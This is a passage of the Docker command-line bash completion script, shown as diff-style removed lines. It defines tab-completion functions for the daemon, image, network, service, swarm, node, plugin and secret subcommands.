__docker_complete_containers_unpauseable - fi - ;; - esac -} - -_docker_container_update() { - local options_with_args=" - --blkio-weight - --cpu-period - --cpu-quota - --cpu-rt-period - --cpu-rt-runtime - --cpuset-cpus - --cpuset-mems - --cpu-shares -c - --kernel-memory - --memory -m - --memory-reservation - --memory-swap - --restart - " - - local boolean_options=" - --help - " - - local all_options="$options_with_args $boolean_options" - - __docker_complete_restart && return - - case "$prev" in - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_all - ;; - esac -} - -_docker_container_wait() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_containers_all - ;; - esac -} - - -_docker_commit() { - _docker_container_commit -} - -_docker_cp() { - _docker_container_cp -} - -_docker_create() { - _docker_container_run -} - -_docker_daemon() { - local boolean_options=" - $global_boolean_options - --disable-legacy-registry - --experimental - --help - --icc=false - --init - --ip-forward=false - --ip-masq=false - --iptables=false - --ipv6 - --live-restore - --raw-logs - --selinux-enabled - --userland-proxy=false - " - local options_with_args=" - $global_options_with_args - --add-runtime - --api-cors-header - --authorization-plugin - --bip - --bridge -b - --cgroup-parent - --cluster-advertise - --cluster-store - --cluster-store-opt - --config-file - --containerd - --default-gateway - --default-gateway-v6 - --default-ulimit - --dns - --dns-search - --dns-opt - --exec-opt - --exec-root - --fixed-cidr - --fixed-cidr-v6 - --graph -g - --group -G - --init-path - --insecure-registry - --ip - --label - --log-driver - --log-opt - --max-concurrent-downloads - --max-concurrent-uploads - --mtu - --oom-score-adjust - --pidfile -p - --registry-mirror - --seccomp-profile - --shutdown-timeout - 
--storage-driver -s - --storage-opt - --userland-proxy-path - --userns-remap - " - - __docker_complete_log_driver_options && return - - key=$(__docker_map_key_of_current_option '--cluster-store-opt') - case "$key" in - kv.*file) - cur=${cur##*=} - _filedir - return - ;; - esac - - local key=$(__docker_map_key_of_current_option '--storage-opt') - case "$key" in - dm.blkdiscard|dm.override_udev_sync_check|dm.use_deferred_removal|dm.use_deferred_deletion) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - dm.fs) - COMPREPLY=( $( compgen -W "ext4 xfs" -- "${cur##*=}" ) ) - return - ;; - dm.thinpooldev) - cur=${cur##*=} - _filedir - return - ;; - esac - - case "$prev" in - --authorization-plugin) - __docker_complete_plugins_bundled --type Authorization - return - ;; - --cluster-store) - COMPREPLY=( $( compgen -W "consul etcd zk" -S "://" -- "$cur" ) ) - __docker_nospace - return - ;; - --cluster-store-opt) - COMPREPLY=( $( compgen -W "discovery.heartbeat discovery.ttl kv.cacertfile kv.certfile kv.keyfile kv.path" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - --config-file|--containerd|--init-path|--pidfile|-p|--tlscacert|--tlscert|--tlskey|--userland-proxy-path) - _filedir - return - ;; - --exec-root|--graph|-g) - _filedir -d - return - ;; - --log-driver) - __docker_complete_log_drivers - return - ;; - --storage-driver|-s) - COMPREPLY=( $( compgen -W "aufs btrfs devicemapper overlay overlay2 vfs zfs" -- "$(echo $cur | tr '[:upper:]' '[:lower:]')" ) ) - return - ;; - --storage-opt) - local btrfs_options="btrfs.min_space" - local devicemapper_options=" - dm.basesize - dm.blkdiscard - dm.blocksize - dm.fs - dm.loopdatasize - dm.loopmetadatasize - dm.min_free_space - dm.mkfsarg - dm.mountopt - dm.override_udev_sync_check - dm.thinpooldev - dm.use_deferred_deletion - dm.use_deferred_removal - " - local zfs_options="zfs.fsname" - - case $(__docker_value_of_option '--storage-driver|-s') in - '') - COMPREPLY=( $( compgen -W "$btrfs_options 
$devicemapper_options $zfs_options" -S = -- "$cur" ) ) - ;; - btrfs) - COMPREPLY=( $( compgen -W "$btrfs_options" -S = -- "$cur" ) ) - ;; - devicemapper) - COMPREPLY=( $( compgen -W "$devicemapper_options" -S = -- "$cur" ) ) - ;; - zfs) - COMPREPLY=( $( compgen -W "$zfs_options" -S = -- "$cur" ) ) - ;; - *) - return - ;; - esac - __docker_nospace - return - ;; - --log-level|-l) - __docker_complete_log_levels - return - ;; - --log-opt) - __docker_complete_log_options - return - ;; - --seccomp-profile) - _filedir json - return - ;; - --userns-remap) - __docker_complete_user_group - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) - ;; - esac -} - -_docker_deploy() { - __docker_is_experimental && _docker_stack_deploy -} - -_docker_diff() { - _docker_container_diff -} - -_docker_events() { - _docker_system_events -} - -_docker_exec() { - _docker_container_exec -} - -_docker_export() { - _docker_container_export -} - -_docker_help() { - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - COMPREPLY=( $( compgen -W "${commands[*]}" -- "$cur" ) ) - fi -} - -_docker_history() { - _docker_image_history -} - - -_docker_image() { - local subcommands=" - build - history - import - inspect - load - ls - prune - pull - push - rm - save - tag - " - local aliases=" - images - list - remove - rmi - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_image_build() { - local options_with_args=" - --build-arg - --cache-from - --cgroup-parent - --cpuset-cpus - --cpuset-mems - --cpu-shares -c - --cpu-period - --cpu-quota - --file -f - --isolation - --label - --memory -m - --memory-swap - --network - --shm-size - --tag -t - --ulimit - " - - local 
boolean_options=" - --compress - --disable-content-trust=false - --force-rm - --help - --no-cache - --pull - --quiet -q - --rm - " - __docker_is_experimental && boolean_options+="--squash" - - local all_options="$options_with_args $boolean_options" - - case "$prev" in - --build-arg) - COMPREPLY=( $( compgen -e -- "$cur" ) ) - __docker_nospace - return - ;; - --cache-from) - __docker_complete_image_repos_and_tags - return - ;; - --file|-f) - _filedir - return - ;; - --isolation) - __docker_complete_isolation - return - ;; - --network) - case "$cur" in - container:*) - __docker_complete_containers_all --cur "${cur#*:}" - ;; - *) - COMPREPLY=( $( compgen -W "$(__docker_plugins --type Network) $(__docker_networks) container:" -- "$cur") ) - if [ "${COMPREPLY[*]}" = "container:" ] ; then - __docker_nospace - fi - ;; - esac - return - ;; - --tag|-t) - __docker_complete_image_repos_and_tags - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) - if [ $cword -eq $counter ]; then - _filedir -d - fi - ;; - esac -} - -_docker_image_history() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --human=false -H=false --no-trunc --quiet -q" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_images - fi - ;; - esac -} - -_docker_image_images() { - _docker_image_ls -} - -_docker_image_import() { - case "$prev" in - --change|-c|--message|-m) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--change -c --help --message -m" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--change|-c|--message|-m') - if [ $cword -eq $counter ]; then - return - fi - (( counter++ )) - - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags 
- return - fi - ;; - esac -} - -_docker_image_inspect() { - _docker_inspect --type image -} - -_docker_image_load() { - case "$prev" in - --input|-i) - _filedir - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --input -i --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_image_list() { - _docker_image_ls -} - -_docker_image_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - before|since|reference) - cur="${cur##*=}" - __docker_complete_images - return - ;; - dangling) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - label) - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "before dangling label reference since" -- "$cur" ) ) - __docker_nospace - return - ;; - --format) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --digests --filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) ) - ;; - =) - return - ;; - *) - __docker_complete_image_repos - ;; - esac -} - -_docker_image_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_image_pull() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all-tags -a --disable-content-trust=false --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - for arg in "${COMP_WORDS[@]}"; do - case "$arg" in - --all-tags|-a) - __docker_complete_image_repos - return - ;; - esac - done - __docker_complete_image_repos_and_tags - fi - ;; - esac -} - -_docker_image_push() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--disable-content-trust=false --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags - fi - ;; - esac -} - -_docker_image_remove() { - _docker_image_rm -} - -_docker_image_rm() { - case "$cur" in - -*) - 
COMPREPLY=( $( compgen -W "--force -f --help --no-prune" -- "$cur" ) ) - ;; - *) - __docker_complete_images - ;; - esac -} - -_docker_image_rmi() { - _docker_image_rm -} - -_docker_image_save() { - case "$prev" in - --output|-o) - _filedir - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) ) - ;; - *) - __docker_complete_images - ;; - esac -} - -_docker_image_tag() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags - return - fi - (( counter++ )) - - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags - return - fi - ;; - esac -} - - -_docker_images() { - _docker_image_ls -} - -_docker_import() { - _docker_image_import -} - -_docker_info() { - _docker_system_info -} - -_docker_inspect() { - local preselected_type - local type - - if [ "$1" = "--type" ] ; then - preselected_type=yes - type="$2" - else - type=$(__docker_value_of_option --type) - fi - - case "$prev" in - --format|-f) - return - ;; - --type) - if [ -z "$preselected_type" ] ; then - COMPREPLY=( $( compgen -W "container image network node plugin service volume" -- "$cur" ) ) - return - fi - ;; - esac - - case "$cur" in - -*) - local options="--format -f --help --size -s" - if [ -z "$preselected_type" ] ; then - options+=" --type" - fi - COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) - ;; - *) - case "$type" in - '') - COMPREPLY=( $( compgen -W " - $(__docker_containers --all) - $(__docker_images) - $(__docker_networks) - $(__docker_nodes) - $(__docker_plugins_installed) - $(__docker_services) - $(__docker_volumes) - " -- "$cur" ) ) - ;; - container) - __docker_complete_containers_all - ;; - image) - __docker_complete_images - ;; - network) - __docker_complete_networks - ;; - node) - __docker_complete_nodes - ;; - plugin) - __docker_complete_plugins_installed - ;; - 
service) - __docker_complete_services - ;; - volume) - __docker_complete_volumes - ;; - esac - esac -} - -_docker_kill() { - _docker_container_kill -} - -_docker_load() { - _docker_image_load -} - -_docker_login() { - case "$prev" in - --password|-p|--username|-u) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --password -p --username -u" -- "$cur" ) ) - ;; - esac -} - -_docker_logout() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - esac -} - -_docker_logs() { - _docker_container_logs -} - -_docker_network_connect() { - local options_with_args=" - --alias - --ip - --ip6 - --link - --link-local-ip - " - - local boolean_options=" - --help - " - - case "$prev" in - --link) - case "$cur" in - *:*) - ;; - *) - __docker_complete_containers_running - COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) - __docker_nospace - ;; - esac - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) - if [ $cword -eq $counter ]; then - __docker_complete_networks - elif [ $cword -eq $(($counter + 1)) ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_network_create() { - case "$prev" in - --aux-address|--gateway|--internal|--ip-range|--ipam-opt|--ipv6|--opt|-o|--subnet) - return - ;; - --ipam-driver) - COMPREPLY=( $( compgen -W "default" -- "$cur" ) ) - return - ;; - --driver|-d) - # remove drivers that allow one instance only, add drivers missing in `docker info` - __docker_complete_plugins_bundled --type Network --remove host --remove null --add macvlan - return - ;; - --label) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--attachable --aux-address --driver -d --gateway --help --internal --ip-range --ipam-driver --ipam-opt 
--ipv6 --label --opt -o --subnet" -- "$cur" ) ) - ;; - esac -} - -_docker_network_disconnect() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_networks - elif [ $cword -eq $(($counter + 1)) ]; then - __docker_complete_containers_in_network "$prev" - fi - ;; - esac -} - -_docker_network_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_networks - esac -} - -_docker_network_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - driver) - __docker_complete_plugins_bundled --cur "${cur##*=}" --type Network --add macvlan - return - ;; - id) - __docker_complete_networks --cur "${cur##*=}" --id - return - ;; - name) - __docker_complete_networks --cur "${cur##*=}" --name - return - ;; - type) - COMPREPLY=( $( compgen -W "builtin custom" -- "${cur##*=}" ) ) - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "driver id label name type" -- "$cur" ) ) - __docker_nospace - return - ;; - --format) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_network_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_network_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_networks --filter type=custom - esac -} - -_docker_network() { - local subcommands=" - connect - create - disconnect - inspect - ls - prune - rm - " - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - 
;; - esac -} - -_docker_service() { - local subcommands=" - create - inspect - ls list - rm remove - scale - ps - update - " - __docker_daemon_is_experimental && subcommands+="logs" - - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_service_create() { - _docker_service_update -} - -_docker_service_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) ) - ;; - *) - __docker_complete_services - esac -} - -_docker_service_logs() { - case "$prev" in - --since|--tail) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--details --follow -f --help --no-resolve --since --tail --timestamps -t" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--since|--tail') - if [ $cword -eq $counter ]; then - __docker_complete_services - fi - ;; - esac -} - -_docker_service_list() { - _docker_service_ls -} - -_docker_service_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - id) - __docker_complete_services --cur "${cur##*=}" --id - return - ;; - name) - __docker_complete_services --cur "${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_service_remove() { - _docker_service_rm -} - -_docker_service_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_services - esac -} - -_docker_service_scale() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_services - 
__docker_append_to_completions "=" - __docker_nospace - ;; - esac -} - -_docker_service_ps() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - desired-state) - COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) - return - ;; - name) - __docker_complete_services --cur "${cur##*=}" --name - return - ;; - node) - __docker_complete_nodes_plus_self --cur "${cur##*=}" - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -W "desired-state id name node" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc --quiet -q" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--filter|-f') - if [ $cword -eq $counter ]; then - __docker_complete_services - fi - ;; - esac -} - -_docker_service_update() { - local $subcommand="${words[$subcommand_pos]}" - - local options_with_args=" - --constraint - --endpoint-mode - --env -e - --force - --health-cmd - --health-interval - --health-retries - --health-timeout - --hostname - --label -l - --limit-cpu - --limit-memory - --log-driver - --log-opt - --mount - --network - --no-healthcheck - --replicas - --reserve-cpu - --reserve-memory - --restart-condition - --restart-delay - --restart-max-attempts - --restart-window - --rollback - --stop-grace-period - --update-delay - --update-failure-action - --update-max-failure-ratio - --update-monitor - --update-parallelism - --user -u - --workdir -w - " - - local boolean_options=" - --help - --tty -t - --with-registry-auth - " - - __docker_complete_log_driver_options && return - - if [ "$subcommand" = "create" ] ; then - options_with_args="$options_with_args - --container-label - --dns - --dns-option - --dns-search - --env-file - --group - --host - --mode - --name - --publish -p - --secret - " - - case "$prev" in - --env-file) - _filedir - return - ;; - --host) - case "$cur" in - *:) - 
__docker_complete_resolved_hostname - return - ;; - esac - ;; - --mode) - COMPREPLY=( $( compgen -W "global replicated" -- "$cur" ) ) - return - ;; - --secret) - __docker_complete_secrets - return - ;; - --group) - COMPREPLY=( $(compgen -g -- "$cur") ) - return - ;; - esac - fi - if [ "$subcommand" = "update" ] ; then - options_with_args="$options_with_args - --arg - --container-label-add - --container-label-rm - --dns-add - --dns-option-add - --dns-option-rm - --dns-rm - --dns-search-add - --dns-search-rm - --group-add - --group-rm - --host-add - --host-rm - --image - --publish-add - --publish-rm - --secret-add - --secret-rm - " - - case "$prev" in - --group-add) - COMPREPLY=( $(compgen -g -- "$cur") ) - return - ;; - --group-rm) - COMPREPLY=( $(compgen -g -- "$cur") ) - return - ;; - --host-add|--host-rm) - case "$cur" in - *:) - __docker_complete_resolved_hostname - return - ;; - esac - ;; - --image) - __docker_complete_image_repos_and_tags - return - ;; - --secret-add|--secret-rm) - __docker_complete_secrets - return - ;; - esac - fi - - case "$prev" in - --endpoint-mode) - COMPREPLY=( $( compgen -W "dnsrr vip" -- "$cur" ) ) - return - ;; - --env|-e) - # we do not append a "=" here because "-e VARNAME" is legal systax, too - COMPREPLY=( $( compgen -e -- "$cur" ) ) - __docker_nospace - return - ;; - --log-driver) - __docker_complete_log_drivers - return - ;; - --log-opt) - __docker_complete_log_options - return - ;; - --network) - __docker_complete_networks - return - ;; - --restart-condition) - COMPREPLY=( $( compgen -W "any none on-failure" -- "$cur" ) ) - return - ;; - --user|-u) - __docker_complete_user_group - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) - if [ "$subcommand" = "update" ] ; then - if [ $cword -eq 
$counter ]; then - __docker_complete_services - fi - else - if [ $cword -eq $counter ]; then - __docker_complete_images - fi - fi - ;; - esac -} - -_docker_swarm() { - local subcommands=" - init - join - join-token - leave - unlock - unlock-key - update - " - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_init() { - case "$prev" in - --advertise-addr) - if [[ $cur == *: ]] ; then - COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) - else - __docker_complete_local_interfaces - __docker_nospace - fi - return - ;; - --availability) - COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) ) - return - ;; - --cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit) - return - ;; - --listen-addr) - if [[ $cur == *: ]] ; then - COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) - else - __docker_complete_local_interfaces --add 0.0.0.0 - __docker_nospace - fi - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--advertise-addr --autolock --availability --cert-expiry --dispatcher-heartbeat --external-ca --force-new-cluster --help --listen-addr --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_join() { - case "$prev" in - --advertise-addr) - if [[ $cur == *: ]] ; then - COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) - else - __docker_complete_local_interfaces - __docker_nospace - fi - return - ;; - --listen-addr) - if [[ $cur == *: ]] ; then - COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) - else - __docker_complete_local_interfaces --add 0.0.0.0 - __docker_nospace - fi - return - ;; - --token) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--advertise-addr --help --listen-addr --token" -- "$cur" ) ) - ;; - *:) - COMPREPLY=( $( 
compgen -W "2377" -- "${cur##*:}" ) ) - ;; - esac -} - -_docker_swarm_join-token() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag ) - if [ $cword -eq $counter ]; then - COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) ) - fi - ;; - esac -} - -_docker_swarm_leave() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_unlock() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_unlock-key() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_update() { - case "$prev" in - --cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--autolock --cert-expiry --dispatcher-heartbeat --external-ca --help --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) ) - ;; - esac -} - -_docker_node() { - local subcommands=" - demote - inspect - ls list - promote - rm remove - ps - update - " - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_node_demote() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes --filter role=manager - esac -} - -_docker_node_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes_plus_self - esac -} - -_docker_node_list() { - _docker_node_ls -} - -_docker_node_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - 
id) - __docker_complete_nodes --cur "${cur##*=}" --id - return - ;; - name) - __docker_complete_nodes --cur "${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_node_promote() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes --filter role=worker - esac -} - -_docker_node_remove() { - _docker_node_rm -} - -_docker_node_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes - esac -} - -_docker_node_ps() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - desired-state) - COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) - return - ;; - name) - __docker_complete_services --cur "${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -W "desired-state id label name" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes_plus_self - ;; - esac -} - -_docker_node_update() { - case "$prev" in - --availability) - COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) ) - return - ;; - --role) - COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) ) - return - ;; - --label-add|--label-rm) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--availability --help --label-add --label-rm --role" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes - esac -} - -_docker_pause() { - _docker_container_pause -} - -_docker_plugin() { - local subcommands=" - create - disable - enable - inspect - install - ls - push - rm - set - " - local 
aliases=" - list - remove - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_plugin_create() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--compress --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - # reponame - return - elif [ $cword -eq $((counter + 1)) ]; then - _filedir -d - fi - ;; - esac -} - -_docker_plugin_disable() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_plugins_installed - fi - ;; - esac -} - -_docker_plugin_enable() { - case "$prev" in - --timeout) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --timeout" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--timeout') - if [ $cword -eq $counter ]; then - __docker_complete_plugins_installed - fi - ;; - esac -} - -_docker_plugin_inspect() { - case "$prev" in - --format|f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_plugins_installed - ;; - esac -} - -_docker_plugin_install() { - case "$prev" in - --alias) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--alias --disable --disable-content-trust=false --grant-all-permissions --help" -- "$cur" ) ) - ;; - esac -} - -_docker_plugin_list() { - _docker_plugin_ls -} - -_docker_plugin_ls() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --no-trunc" -- "$cur" ) ) - ;; - esac -} - -_docker_plugin_push() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - 
__docker_complete_plugins_installed - fi - ;; - esac -} - -_docker_plugin_remove() { - _docker_plugin_rm -} - -_docker_plugin_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_plugins_installed - ;; - esac -} - -_docker_plugin_set() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_plugins_installed - fi - ;; - esac -} - - -_docker_port() { - _docker_container_port -} - -_docker_ps() { - _docker_container_ls -} - -_docker_pull() { - _docker_image_pull -} - -_docker_push() { - _docker_image_push -} - -_docker_rename() { - _docker_container_rename -} - -_docker_restart() { - _docker_container_restart -} - -_docker_rm() { - _docker_container_rm -} - -_docker_rmi() { - _docker_image_rm -} - -_docker_run() { - _docker_container_run -} - -_docker_save() { - _docker_image_save -} - - -_docker_secret() { - local subcommands=" - create - inspect - ls - rm - " - local aliases=" - list - remove - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - 